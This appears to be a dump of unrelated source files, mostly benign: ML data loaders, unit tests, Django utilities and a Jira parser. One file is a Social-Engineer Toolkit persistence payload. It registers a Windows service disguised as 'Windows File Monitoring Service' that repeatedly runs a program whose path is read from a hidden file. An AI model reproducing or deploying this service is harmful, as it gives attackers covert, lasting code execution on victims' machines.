Returns:
A generator of all batches.
"""
raise NotImplementedError()
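# A minimal concrete subclass might look like the sketch below (illustrative
# only; it simply walks the dataloaders one after another):
#
#   class SequentialScheduler(Scheduler):
#       def get_num_batches(self, dataloaders):
#           return sum(len(dl) for dl in dataloaders)
#
#       def get_batches(self, dataloaders, model=None):
#           for dl in dataloaders:
#               for batch in dl:
#                   yield batch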
| 3.234375 | 3 |
reports/utils.py | Rakib1508/django-sales-stat | 0 | 12796828 | from django.core.files.base import ContentFile
import base64
import uuid
def get_report_image(data):
_, image_binary = data.split(';base64')
decoded_image = base64.b64decode(image_binary)
img_name = str(uuid.uuid4())[:10] + '.png'
data = ContentFile(decoded_image, name=img_name)
return data
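# Illustrative usage (hypothetical data URL): given a canvas export such as
# "data:image/png;base64,iVBORw0KG...", get_report_image(data) returns a
# ContentFile named with a random 10-character prefix and a .png extension,
# ready to assign to an ImageField.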
| 2.1875 | 2 |
src/payloads/set_payloads/persistence.py | rockstar9788/socialtoolkit | 0 | 12796829 | #!/usr/bin/python
#
##########################################################################
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
##########################################################################
#
# ex usage: persistence.exe install, start, stop, remove
#
# You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging
#
##########################################################################
import win32service
import win32serviceutil
import win32event
import win32evtlogutil
import win32traceutil
import servicemanager
import winerror
import time
import sys
import os
import subprocess
class aservice(win32serviceutil.ServiceFramework):
_svc_name_ = "windows_monitoring"
_svc_display_name_ = "Windows File Monitoring Service"
_svc_deps_ = ["EventLog"]
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.isAlive = True
def SvcStop(self):
# tell Service Manager we are trying to stop (required)
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# set the event to call
win32event.SetEvent(self.hWaitStop)
self.isAlive = False
def SvcDoRun(self):
import servicemanager
# wait for being stopped ...
self.timeout = 1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir = os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# pull the windows operating system version number
windows_version = sys.getwindowsversion()[2]
# pull integer of version number
windows_version = int(windows_version)
# windows XP and below
if windows_version < 3791:
fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to
# AppData instead
if windows_version > 3791:
fileopen = open("%s\\isjxwqjs" % (homedir_path), "r")
for line in fileopen:
# pull set-path, this is pulled from interactive shell and
# written when persistence is called
set_path = line.rstrip()
# specify filename to execute the SET interactive shell
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# sleep 30 mins
time.sleep(1800)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
return
if __name__ == '__main__':
# If called without command line arguments, run as the service; otherwise handle install/start/stop/remove
if len(sys.argv) == 1:
try:
evtsrc_dll = os.path.abspath(servicemanager.__file__)
servicemanager.PrepareToHostSingle(aservice)
servicemanager.Initialize('aservice', evtsrc_dll)
servicemanager.StartServiceCtrlDispatcher()
except win32service.error as details:
if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT:
win32serviceutil.usage()
else:
win32serviceutil.HandleCommandLine(aservice)
| 1.953125 | 2 |
data_loader.py | prl900/generative_precipitation | 0 | 12796830 | <gh_stars>0
import numpy as np
import xarray as xr
class DataLoader():
def __init__(self):
# Load ERA5 geopotential levels
era5_ds1 = xr.open_dataset("./datasets/GEOP1000_GAN_2017.nc")
era5_ds2 = xr.open_dataset("./datasets/GEOP800_GAN_2017.nc")
era5_ds3 = xr.open_dataset("./datasets/GEOP500_GAN_2017.nc")
era5_times = era5_ds1.time[:].data
# Load ERA5 total precipitation
prec_ds = xr.open_dataset("./datasets/TP_GAN_2017.nc")
prec_times = prec_ds.time[:].data
# Find common dates and shuffle
times = np.intersect1d(era5_times, prec_times)
np.random.shuffle(times)
# Create geopotential normalised stack
z500 = era5_ds3.Geopotential.sel(time=times[::10])[:].data
z500 = (z500 - z500.min()) / (z500.max() - z500.min())
z800 = era5_ds2.Geopotential.sel(time=times[::10])[:].data
z800 = (z800 - z800.min()) / (z800.max() - z800.min())
z1000 = era5_ds1.Geopotential.sel(time=times[::10])[:].data
z1000 = (z1000 - z1000.min()) / (z1000.max() - z1000.min())
z = np.stack((z1000, z800, z500), axis=3)
z = (z * 2) - 1
# Create precipitation normalised stack
tp = prec_ds.tp.sel(time=times[::10])[:].data * 1000
tp = np.clip(tp, 0, 30)
tp1 = tp / 30
tp2 = np.log(1+tp)/np.log(31)
tp3 = np.log(1+np.log(1+tp))
tp3 = np.clip(tp3, 0, 1)
tp = np.stack((tp3, tp3, tp3), axis=3)
tp = (tp * 2) - 1
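# Note: both the geopotential and precipitation stacks are rescaled from [0, 1]
# to [-1, 1]; this is assumed to match a tanh-activated generator output range
# used downstream.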
self.prec_train = tp[:600,:,:,:]
self.era5_train = z[:600,:,:,:]
self.prec_test = tp[600:750,:,:,:]
self.era5_test = z[600:750,:,:,:]
self.prec_val = tp[750:,:,:]
self.era5_val = z[750:,:,:]
def load_data(self, batch_size=1, is_testing=False):
if is_testing:
idx = np.random.choice(self.prec_test.shape[0], size=batch_size)
return self.prec_test[idx,:,:,:], self.era5_test[idx,:,:,:]
else:
idx = np.random.choice(self.prec_train.shape[0], size=batch_size)
return self.prec_train[idx,:,:,:], self.era5_train[idx,:,:,:]
def load_batch(self, batch_size=1, is_testing=False):
prec_data = None
him_data = None
if is_testing:
prec_data = self.prec_test
him_data = self.era5_test
else:
prec_data = self.prec_train
him_data = self.era5_train
self.n_batches = int(prec_data.shape[0] / batch_size)
for i in range(self.n_batches-1):
yield prec_data[i*batch_size:(i+1)*batch_size,:,:,:], him_data[i*batch_size:(i+1)*batch_size,:,:,:]
| 2.15625 | 2 |
tests/paradrop/lib/utils/test_utils.py | VegetableChook/Paradrop | 1 | 12796831 | <gh_stars>1-10
import copy
import errno
import os
import tempfile
from mock import MagicMock, Mock, patch
from nose.tools import assert_raises
from pdmock import MockChute, MockChuteStorage, writeTempFile
from paradrop.lib.utils import pdos
from paradrop.lib.utils import pdosq
from paradrop.lib.utils.pd_storage import PDStorage
NETWORK_WAN_CONFIG = """
config interface wan #__PARADROP__
option ifname 'eth0'
option proto 'dhcp'
"""
class TestStorage(PDStorage):
def __init__(self, filename):
super(TestStorage, self).__init__(filename, 0)
self.data = None
def setAttr(self, data):
self.data = data
def getAttr(self):
return self.data
def attrSaveable(self):
return (self.data is not None)
def test_addresses():
"""
Test IP address utility functions
"""
from paradrop.lib.utils import addresses
ipaddr = "192.168.1.1"
assert addresses.isIpValid(ipaddr)
ipaddr = "192.168.1.256"
assert not addresses.isIpValid(ipaddr)
chute = MockChute(name="first")
chute.IPs.append("192.168.1.1")
chute.SSIDs.append("Paradrop")
chute.staticIPs.append("192.168.33.1")
storage = MockChuteStorage()
storage.chuteList.append(chute)
assert not addresses.isIpAvailable("192.168.1.1", storage, "second")
assert addresses.isIpAvailable("192.168.2.1", storage, "second")
assert addresses.isIpAvailable("192.168.1.1", storage, "first")
assert not addresses.isWifiSSIDAvailable("Paradrop", storage, "second")
assert addresses.isWifiSSIDAvailable("available", storage, "second")
assert addresses.isWifiSSIDAvailable("Paradrop", storage, "first")
assert not addresses.isStaticIpAvailable("192.168.33.1", storage, "second")
assert addresses.isStaticIpAvailable("192.168.35.1", storage, "second")
assert addresses.isStaticIpAvailable("192.168.33.1", storage, "first")
assert not addresses.checkPhyExists(-100)
ipaddr = "192.168.1.1"
netmask = "255.255.255.0"
assert addresses.incIpaddr("192.168.1.1") == "192.168.1.2"
assert addresses.incIpaddr("fail") is None
assert addresses.maxIpaddr(ipaddr, netmask) == "192.168.1.254"
assert addresses.maxIpaddr(ipaddr, "fail") is None
assert addresses.getSubnet(ipaddr, netmask) == "192.168.1.0"
assert addresses.getSubnet(ipaddr, "fail") is None
# Test with nothing in the cache
assert addresses.getInternalIntfList(chute) is None
assert addresses.getGatewayIntf(chute) == (None, None)
assert addresses.getWANIntf(chute) is None
# Now put an interface in the cache
ifaces = [{
'internalIntf': "eth0",
'netType': "wan",
'externalIpaddr': "192.168.1.1"
}]
chute.setCache("networkInterfaces", ifaces)
assert addresses.getInternalIntfList(chute) == ["eth0"]
assert addresses.getGatewayIntf(chute) == ("192.168.1.1", "eth0")
assert addresses.getWANIntf(chute) == ifaces[0]
def test_pdos():
"""
Test pdos utility module
"""
assert pdos.getMountCmd() == "mount"
assert pdos.isMount("/")
assert pdos.ismount("/")
assert pdos.oscall("true") is None
assert pdos.oscall("false") is not None
assert pdos.oscall("echo hello") is None
assert pdos.oscall("echo hello 1>&2") is None
# Make a file, check that our functions respond correctly to it
path = writeTempFile("hello")
assert pdos.fixpath(path) == path
assert "text" in pdos.getFileType(path)
assert pdos.exists(path)
assert not pdos.isdir(path)
assert pdos.isfile(path)
# Remove the file, check that our functions detect that
pdos.unlink(path)
assert pdos.fixpath(path) == path
assert pdos.getFileType(path) is None
assert not pdos.exists(path)
assert not pdos.isdir(path)
assert not pdos.isfile(path)
# Make a directory there instead
pdos.mkdir(path)
assert pdos.fixpath(path) == path
assert "directory" in pdos.getFileType(path)
assert pdos.exists(path)
assert pdos.isdir(path)
assert not pdos.isfile(path)
# Now we will do some manipulations on files under that directory
a = os.path.join(path, "a")
b = os.path.join(path, "b")
c = os.path.join(path, "c")
d = os.path.join(path, "d")
pdos.write(a, "hello")
assert pdos.isfile(a)
pdos.copy(a, b)
assert pdos.isfile(b)
pdos.symlink(a, c)
assert pdos.isfile(c)
pdos.move(a, b)
assert not pdos.isfile(a)
pdos.remove(b)
assert not pdos.isfile(b)
pdos.mkdir(a)
pdos.copytree(a, b)
assert pdos.isdir(b)
# Remove a non-empty directory
pdos.remove(path)
assert not pdos.isdir(path)
# This file is under a directory that no longer exists, so the write must
# fail.
#
# TODO: These should not fail silently. They should either return an error
# indicator or raise an exception.
pdos.writeFile(a, "c")
pdos.write(a, "c")
# Test various ways to call writeFile
pdos.writeFile(path, ["a", "b"])
pdos.writeFile(path, "c")
pdos.writeFile(path, 5) # This one does nothing.
# Test the content with readFile
data = pdos.readFile(path, array=False, delimiter="")
assert data == "abc"
data = pdos.readFile(path, array=True)
assert data == ["a", "b", "c"]
pdos.remove(path)
assert pdos.readFile(path) is None
def test_pdosq():
"""
Test pdosq utility functions
"""
# Test makedirs with an already-exists error, returns False.
with patch('os.makedirs', side_effect=OSError(errno.EEXIST, "error")):
assert pdosq.makedirs("/") is False
# Test makedirs with a permission error, passes on the Exception.
with patch('os.makedirs', side_effect=OSError(errno.EPERM, "error")):
assert_raises(OSError, pdosq.makedirs, "/")
def test_storage():
"""
Test PDStorage class
"""
temp = tempfile.mkdtemp()
filename = os.path.join(temp, "storage")
storage = PDStorage(filename, 0)
# PDStorage needs to be subclassed; the base class always returns not
# saveable.
assert storage.attrSaveable() is False
storage = TestStorage(filename)
data = {"key": "value"}
with open(filename, "w") as output:
output.write("BAD CONTENTS")
# The first attempt to read it will fail and try to delete the file. We
# will cause the unlink to fail on the first try and let it succeed on the
# second try.
with patch("paradrop.lib.utils.pdos.unlink", side_effect=Exception("Boom!")):
storage.loadFromDisk()
assert os.path.exists(filename)
storage.loadFromDisk()
assert not os.path.exists(filename)
# The first write will fail because we have not provided data yet.
storage.saveToDisk()
assert not os.path.exists(filename)
# Now we will save some data and verify that we can reload it.
storage.setAttr(data)
# Cause the save to fail on the first try, then let it succeed.
with patch("paradrop.lib.utils.pdos.open", side_effect=Exception("Boom!")):
storage.saveToDisk()
storage.saveToDisk()
assert os.path.exists(filename)
storage.setAttr(None)
storage.loadFromDisk()
assert storage.getAttr() == data
# Clean up
pdos.remove(temp)
def test_uci():
"""
Test UCI file utility module
"""
from paradrop.lib.utils import uci
from paradrop.base import settings
# Test functions for finding path to UCI files
settings.loadSettings(mode="unittest")
assert uci.getSystemConfigDir() == "/tmp/.paradrop-test/uci/config.d/"
assert uci.getSystemPath("network") == "/tmp/.paradrop-test/uci/config.d/network"
# Test stringify function
assert uci.stringify("a") == "a"
blob = {"a": "b"}
assert uci.stringify(blob) == blob
blob = {"a": {"b": "c"}}
assert uci.stringify(blob) == blob
blob = {"a": ["b", "c"]}
assert uci.stringify(blob) == blob
blob = {"a": 5}
strblob = {"a": "5"}
assert uci.stringify(blob) == strblob
assert uci.isMatch(blob, strblob)
# Write a realistic configuration and load with uci module
path = writeTempFile(NETWORK_WAN_CONFIG)
config = uci.UCIConfig(path)
# Test if it found the config section that we know should be there
empty = {}
assert config.getConfig(empty) == []
match = {"type": "interface", "name": "wan", "comment": "__PARADROP__"}
assert len(config.getConfig(match)) == 1
match = {"type": "interface", "name": "wan", "comment": "chute"}
assert config.getConfig(match) == []
assert config.getConfigIgnoreComments(empty) == []
assert len(config.getConfigIgnoreComments(match)) == 1
# More existence tests
assert not config.existsConfig(empty, empty)
match_config = {
"type": "interface",
"name": "wan",
"comment": "__PARADROP__"
}
match_options = {
"ifname": "eth0",
"proto": "dhcp"
}
assert config.existsConfig(match_config, match_options)
# Test adding and removing
config.delConfigs([(match_config, match_options)])
assert not config.existsConfig(match_config, match_options)
config.addConfigs([(match_config, match_options)])
assert config.existsConfig(match_config, match_options)
config.delConfig(match_config, match_options)
assert not config.existsConfig(match_config, match_options)
config.addConfig(match_config, match_options)
assert config.existsConfig(match_config, match_options)
# Get configuration by chute name
assert config.getChuteConfigs("none") == []
assert len(config.getChuteConfigs("__PARADROP__")) == 1
# Test saving and reloading
config.save(backupToken="backup")
config2 = uci.UCIConfig(path)
# Simple test for the equality operators
assert config == config2
assert not (config != config2)
# Test chuteConfigsMatch function
assert not uci.chuteConfigsMatch(config.getChuteConfigs("__PARADROP__"),
config2.getChuteConfigs("none"))
assert uci.chuteConfigsMatch(config.getChuteConfigs("__PARADROP__"),
config2.getChuteConfigs("__PARADROP__"))
# Further test the equality operators
config2.filepath = "NOMATCH"
assert not (config == config2)
assert config != config2
config2.filepath = config.filepath
config2.myname = "NOMATCH"
assert not (config == config2)
assert config != config2
config2.myname = config.myname
config2.config = []
assert not (config == config2)
assert config != config2
def test_uci_getLineParts():
"""
Test the UCI getLineParts utility function
"""
from paradrop.lib.utils import uci
line = "config interface wan"
result = uci.getLineParts(line)
assert result == line.split()
# It should eat the apostrophes and give same result.
line2 = "config 'interface' 'wan'"
    result2 = uci.getLineParts(line2)
assert result2 == result
line = "option key '<PASSWORD>'"
result = uci.getLineParts(line)
assert result == ["option", "key", "<PASSWORD>"]
line = "config interface 'oops"
result = uci.getLineParts(line)
assert result == ["config", "interface", "oops"]
| 2.171875 | 2 |
products/urls.py | okosamastar/nisshin_b2b | 0 | 12796832 | from django.urls import path
from . import views
# from django.views.generic import RedirectView
urlpatterns = [
path("", views.CategoriesView.as_view(), name="products.category"),
# path("detail/", RedirectView.as_view(url="/b2b/products/")),
path("detail/<slug:slug>", views.ProductDetail.as_view(), name="products.detail"),
path("<str:cat>/", views.ProductsView.as_view(), name="products.products"),
path(
"<str:cat>/<str:child>", views.ProductsView.as_view(), name="products.products"
),
path("<str:cat>/<str:tag>/", views.ProductsView.as_view(), name="products.tags"),
]
| 1.921875 | 2 |
lesson5/utils.py | BaiduOSS/PaddleTutorial | 33 | 12796833 | <reponame>BaiduOSS/PaddleTutorial<filename>lesson5/utils.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Authors: <NAME>(<EMAIL>)
Date: 2017/11/17 17:27:06
"""
import h5py
import matplotlib.pyplot as plt
import numpy as np
def initialize_parameters(layer):
"""
    Initialize the parameters
    Args:
        layer: the number of nodes in each layer
    Return:
        parameters: the parameters, including w and b
"""
np.random.seed(2)
parameters = {}
    # Randomly initialize w; initialize b to 0
for i in range(len(layer) - 1):
parameters['w' + str(i)] = np.random.randn(
layer[i + 1], layer[i]) / np.sqrt(layer[i])
parameters['b' + str(i)] = np.random.randn(layer[i + 1], 1) * 0
return parameters
def forward_calculate(X, parameters):
"""
    Forward computation
    Args:
        X: features
        parameters: the parameters w and b
    Return:
        A: the input and the outputs of each layer
        Z: the intermediate values of the hidden and output layers
"""
A = []
A.append(X)
Z = []
length = int(len(parameters) / 2)
    # Compute the hidden layers
    for i in range(length - 1):
        # Weighted sum plus bias
        z = np.dot(parameters['w' + str(i)], A[i]) + parameters['b' + str(i)]
        Z.append(z)
        # Activation
        a = np.maximum(0, z)
        A.append(a)
    # Compute the output layer
z = np.dot(parameters['w' + str(length - 1)], A[length - 1]) \
+ parameters['b' + str(length - 1)]
Z.append(z)
a = 1. / (1 + np.exp(-z))
A.append(a)
return A, Z
def calculate_cost(A, Y):
"""
    Compute the cost
    Args:
        A: the input and the outputs of each layer
        Y: the ground-truth labels
    Return:
        cost: the cost value
"""
    m = Y.shape[1]  # number of examples
    Y_out = A[len(A) - 1]  # take the model output
    # Compute the cost
    probability = np.multiply(
        np.log(Y_out), Y) + np.multiply(np.log(1 - Y_out), 1 - Y)
    cost = -1. / m * np.sum(probability)
    cost = np.squeeze(cost)  # make sure the dimensions are correct
return cost
def update_parameters(p, dp, learning_rate):
"""
    Update a parameter
    Args:
        p: the parameter
        dp: the gradient of this parameter
        learning_rate: the learning rate (step size)
    Return:
        the updated parameter
"""
return p - learning_rate * dp
def backward_calculate(A, Z, parameters, Y, learning_rate):
"""
    Backward computation
    Args:
        A: the input and the outputs of each layer
        Z: the intermediate values of each layer
        parameters: the parameters, including w and b
        Y: labels
        learning_rate: the learning rate (step size)
    Return:
        parameters: the updated parameters
"""
m = A[0].shape[1]
length = int(len(parameters) / 2)
    # Backward pass: output layer
    da = - (np.divide(Y, A[length]) - np.divide(1 - Y, 1 - A[length]))
    dz = A[length] - Y
    # Backward pass: hidden layers
    for i in range(1, length):
        da = np.dot(parameters['w' + str(length - i)].T, dz)
        dz = da
        dz[Z[length - i - 1] <= 0] = 0
        # Update the parameters
dw = 1. / m * np.dot(dz, A[length - i - 1].T)
db = 1. / m * np.sum(dz, axis=1, keepdims=True)
parameters['w' + str(length - i - 1)] = update_parameters(
parameters['w' + str(length - i - 1)], dw, learning_rate)
parameters['b' + str(length - i - 1)] = update_parameters(
parameters['b' + str(length - i - 1)], db, learning_rate)
return parameters
def plot_costs(costs, learning_rate):
"""
    Plot the cost curve
    Args:
        costs: the costs recorded during training
        learning_rate: the learning rate (step size)
    Return:
"""
plt.plot(costs)
plt.ylabel('cost')
plt.xlabel('Iterations (per hundreds)')
plt.title("learning rate =" + str(learning_rate))
plt.show()
plt.savefig('costs.png')
def deep_neural_network(X, Y, layer, iteration_nums, learning_rate=0.0075):
"""
    Deep neural network model (forward and backward computation)
    Args:
        X: input values
        Y: ground-truth labels
        layer: the size of each layer
        iteration_nums: the number of training iterations
        learning_rate: the learning rate
    Return:
        parameters: the trained parameters, used for prediction
"""
# np.random.seed(1)
costs = []
    # Initialize the parameters
    parameters = initialize_parameters(layer)
    # Training loop
    for i in range(0, iteration_nums):
        # Forward pass
        A, Z = forward_calculate(X, parameters)
        # Compute the cost
        Cost = calculate_cost(A, Y)
        # Backward pass and parameter update
        parameters = backward_calculate(A, Z, parameters, Y, learning_rate)
        # Print the cost every 100 iterations
        if i % 100 == 0:
            print("Cost after iteration %i: %f" % (i, Cost))
            costs.append(Cost)
# plot_costs(costs, learning_rate)
return parameters
def calc_accuracy(predictions, Y):
"""
    Compute the prediction accuracy
    Args:
        predictions: the predicted labels
        Y: the ground-truth labels
    Return:
        accuracy: the accuracy value
"""
Y = np.squeeze(Y)
right = 0
for i in range(len(predictions)):
if predictions[i] == Y[i]:
right += 1
accuracy = (right / float(len(predictions))) * 100
return accuracy
def predict_image(parameters, X, Y):
"""
    Use the trained model to predict whether an image is a cat (1 cat or 0 non-cat)
    Args:
        parameters: the trained weights and biases
        X: data with shape (px_num * px_num * 3, number of examples)
        Y: labels
    Return:
        accuracy: the prediction accuracy
"""
    # m is the number of examples
    m = X.shape[1]
    A = []
    A.append(X)
    Z = []
    predictions = []
    # Run the forward pass to get predictions
    A, Z = forward_calculate(X, parameters)
    # Take the model output Y_out, i.e. the last element of A
    Y_out = A[len(A) - 1]
    # Convert the continuous Y_out into binary predictions 0 or 1
for i in range(m):
if Y_out[0, i] >= 0.5:
predictions.append(1)
elif Y_out[0, i] < 0.5:
predictions.append(0)
return calc_accuracy(predictions, Y)
def load_data_sets():
"""
    Load the training data and the test data from two .h5 files
    Args:
    Return:
        train_x_ori: the original training data
        train_y: the original training labels
        test_x_ori: the original test data
        test_y: the original test labels
        classes(cat/non-cat): the list of classes
"""
train_data = h5py.File('datasets/train_images.h5', "r")
# train images features
train_x_ori = np.array(train_data["train_set_x"][:])
# train images labels
train_y_ori = np.array(train_data["train_set_y"][:])
test_data = h5py.File('datasets/test_images.h5', "r")
# test images features
test_x_ori = np.array(test_data["test_set_x"][:])
# test images labels
test_y_ori = np.array(test_data["test_set_y"][:])
# the list of classes
classes = np.array(test_data["list_classes"][:])
train_y_ori = train_y_ori.reshape((1, train_y_ori.shape[0]))
test_y_ori = test_y_ori.reshape((1, test_y_ori.shape[0]))
result = [train_x_ori, train_y_ori, test_x_ori,
test_y_ori, classes]
return result
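# Minimal end-to-end sketch of how the utilities above fit together. The layer
# sizes and iteration count are illustrative assumptions, not values taken from
# the original tutorial, and the .h5 files must exist under ./datasets/.
if __name__ == '__main__':
    train_x_ori, train_y, test_x_ori, test_y, classes = load_data_sets()
    # Flatten each image to a (px_num * px_num * 3,) column and scale to [0, 1]
    train_x = train_x_ori.reshape(train_x_ori.shape[0], -1).T / 255.
    test_x = test_x_ori.reshape(test_x_ori.shape[0], -1).T / 255.
    # Assumed network layout: input layer, three hidden layers, one output unit
    layer = [train_x.shape[0], 20, 7, 5, 1]
    parameters = deep_neural_network(train_x, train_y, layer, iteration_nums=2000)
    print("Train accuracy: %f%%" % predict_image(parameters, train_x, train_y))
    print("Test accuracy: %f%%" % predict_image(parameters, test_x, test_y))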
| 3.109375 | 3 |
jiraclient/_deserialize.py | rcoenmans/jira-client | 2 | 12796834 | # -----------------------------------------------------------------------------
# The MIT License (MIT)
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -----------------------------------------------------------------------------
from .models import (
Project,
Board,
Issue,
Sprint,
Attachment,
User,
Comment,
Epic,
Worklog,
Component
)
def _parse_json_to_class(response, result_class, attrs):
values = []
for value in response['values']:
values.append(_map_attrs_values(result_class, attrs, value))
return values
def _get_attr_value(attr, values, default=None):
if attr in values:
return values[attr]
else:
return default
def _map_attrs_values(result_class, attrs, values):
result = result_class()
for attr in attrs:
if attr in values:
setattr(result, attr, _get_attr_value(attr, values))
return result
def _parse_json_to_issues(response):
issues = []
for issue in response['issues']:
issues.append(_parse_json_to_issue(issue))
return issues
def _parse_json_to_issue(response):
issue = Issue()
issue.id = _get_attr_value('id', response)
issue.key = _get_attr_value('key', response)
issue.summary = _get_attr_value('summary', response['fields'])
issue.description = _get_attr_value('description', response['fields'])
issue.labels = _get_attr_value('labels', response['fields'], [])
issue.type = response['fields']['issuetype']['name']
issue.status = response['fields']['status']['name']
issue.created = response['fields']['created']
issue.updated = response['fields']['updated']
issue.creator = User()
issue.creator.name = response['fields']['creator']['name']
issue.creator.email = response['fields']['creator']['emailAddress']
issue.creator.display = response['fields']['creator']['displayName']
issue.reporter = User()
issue.reporter.name = response['fields']['reporter']['name']
issue.reporter.email = response['fields']['reporter']['emailAddress']
issue.reporter.display = response['fields']['reporter']['displayName']
if response['fields']['priority']:
issue.priority = response['fields']['priority']['name']
if response['fields']['assignee']:
issue.assignee = User()
issue.assignee.name = response['fields']['assignee']['name']
issue.assignee.email = response['fields']['assignee']['emailAddress']
issue.assignee.display = response['fields']['assignee']['displayName']
if 'project' in response['fields']:
if response['fields']['project']:
issue.project = _parse_json_to_project(response['fields']['project'])
if 'epic' in response['fields']:
if response['fields']['epic']:
issue.epic = _parse_json_to_epic(response['fields']['epic'])
if 'closedSprints' in response['fields']:
for resp in response['fields']['closedSprints']:
issue.closed_sprints.append(_parse_json_to_sprint(resp))
if 'sprint' in response['fields']:
if response['fields']['sprint']:
issue.sprint = _parse_json_to_sprint(response['fields']['sprint'])
if 'comment' in response['fields']:
for resp in response['fields']['comment']['comments']:
issue.comments.append(_parse_json_to_comment(resp))
if 'attachment' in response['fields']:
for resp in response['fields']['attachment']:
issue.attachments.append(_parse_json_to_attachement(resp))
if 'worklog' in response['fields']:
for resp in response['fields']['worklog']['worklogs']:
issue.worklog.append(_parse_json_to_worklog(resp))
if 'components' in response['fields']:
for resp in response['fields']['components']:
issue.components.append(_parse_json_to_component(resp))
for key, value in response['fields'].items():
if key.startswith('customfield_'):
issue.custom[key] = value
return issue
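# Sketch of the minimal response dict _parse_json_to_issue expects (abridged and
# illustrative -- a real Jira payload carries many more keys):
#
#     {
#         "id": "10001", "key": "PROJ-1",
#         "fields": {
#             "summary": "...", "description": "...", "labels": [],
#             "issuetype": {"name": "Task"}, "status": {"name": "Open"},
#             "created": "...", "updated": "...",
#             "priority": None, "assignee": None,
#             "creator": {"name": "...", "emailAddress": "...", "displayName": "..."},
#             "reporter": {"name": "...", "emailAddress": "...", "displayName": "..."}
#         }
#     }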
def _parse_json_to_sprints(response):
sprints = []
for value in response['values']:
sprints.append(_parse_json_to_sprint(value))
return sprints
def _parse_json_to_sprint(response):
sprint = Sprint()
sprint.id = _get_attr_value('id', response)
sprint.state = _get_attr_value('state', response)
sprint.name = _get_attr_value('name', response)
sprint.goal = _get_attr_value('goal', response)
sprint.board_id = _get_attr_value('originBoardId', response)
sprint.start_date = _get_attr_value('startDate', response)
sprint.end_date = _get_attr_value('endDate', response)
sprint.complete_date = _get_attr_value('completeDate', response)
return sprint
def _parse_json_to_board(response):
attrs = ['id', 'name', 'type', 'location']
return _map_attrs_values(Board, attrs, response)
def _parse_json_to_epic(response):
attrs = ['id', 'name', 'key', 'summary', 'done']
return _map_attrs_values(Epic, attrs, response)
def _parse_json_to_project(response):
attrs = ['id', 'key', 'name']
return _map_attrs_values(Project, attrs, response)
def _parse_json_to_attachement(response):
attachment = Attachment()
attachment.id = response['id']
attachment.filename = response['filename']
attachment.created = response['created']
attachment.size = response['size']
attachment.mime = response['mimeType']
attachment.content = response['content']
attachment.author = User()
attachment.author.name = response['author']['name']
attachment.author.email = response['author']['emailAddress']
attachment.author.display = response['author']['displayName']
return attachment
def _parse_json_to_comment(response):
comment = Comment()
comment.id = response['id']
comment.body = response['body']
comment.created = response['created']
comment.updated = response['updated']
comment.author = User()
comment.author.name = response['author']['name']
comment.author.email = response['author']['emailAddress']
comment.author.display = response['author']['displayName']
return comment
def _parse_json_to_worklog(response):
worklog = Worklog()
worklog.id = response['id']
worklog.issue_id = response['issueId']
worklog.updated = response['updated']
worklog.comment = response['comment']
worklog.author = User()
worklog.author.name = response['author']['name']
worklog.author.display = response['author']['displayName']
return worklog
def _parse_json_to_component(response):
attrs = ['id', 'name', 'description']
return _map_attrs_values(Component, attrs, response) | 1.398438 | 1 |
models/__init__.py | danielism97/ST-MFNet | 5 | 12796835 | <gh_stars>1-10
from .stmfnet import STMFNet | 1.078125 | 1 |
HSTB/kluster/fqpr_drivers.py | davesteps/kluster | 0 | 12796836 | <reponame>davesteps/kluster<filename>HSTB/kluster/fqpr_drivers.py<gh_stars>0
"""
fqpr_drivers = holding place for all the file level access methods that are contained in the HSTB.drivers repository.
Makes adding a new multibeam format a little easier, as if you have a new driver that can be included in all the relevant
functions here, (and you add the format to kluster_variables supported_XXXXXX list) it will work in Kluster.
"""
import os
import numpy as np
from HSTB.kluster import kluster_variables
from HSTB.drivers import kmall, par3, sbet, svp, PCSio
sonar_reference_point = {'.all': ['tx_x', 'tx_y', 'tx_z'],
'.kmall': ['tx_x', 'tx_y', 'tx_z']}
def _check_multibeam_file(multibeam_file: str):
fileext = os.path.splitext(multibeam_file)[1]
if fileext not in kluster_variables.supported_multibeam:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported multibeam file ({})'.format(multibeam_file, kluster_variables.supported_multibeam))
def _check_sbet_file(sbet_file: str):
fileext = os.path.splitext(sbet_file)[1]
if fileext not in kluster_variables.supported_ppnav:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported post processed navigation (SBET) file ({})'.format(sbet_file, kluster_variables.supported_ppnav))
def _check_pos_file(pos_file: str):
fileext = os.path.splitext(pos_file)[1]
try:
